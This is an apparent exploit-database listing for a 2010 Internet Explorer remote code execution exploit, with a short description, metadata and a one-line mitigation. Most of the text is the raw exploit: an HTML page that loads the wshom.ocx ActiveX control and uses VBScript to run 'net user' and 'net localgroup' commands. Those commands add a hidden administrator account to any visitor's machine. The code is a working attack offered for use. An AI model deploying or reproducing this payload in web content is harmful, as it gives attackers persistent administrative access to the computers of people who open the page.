header-logo
Suggest Exploit
vendor:
N/A
by:
Stack
9,3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: N/A
Affected Version From: ALL
Affected Version To: ALL
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)

This exploit uses the Run method of the wshom.ocx ActiveX control to execute arbitrary commands on the target system. The exploit adds a new user with administrative privileges to the system.

Mitigation:

Disable the wshom.ocx ActiveX control in the Internet Explorer security settings.
Source

Exploit-DB raw data:

# Exploit Title: IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
# Date: 22/01/2010
# Author: Stack
# Version: ALL
# Tested on: winsp2
<html>
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'
></object>
<script language='vbscript'>

arg1="cmd /c net user username password /add && net localgroup Administrateurs username /add"

target.run arg1

</script></p>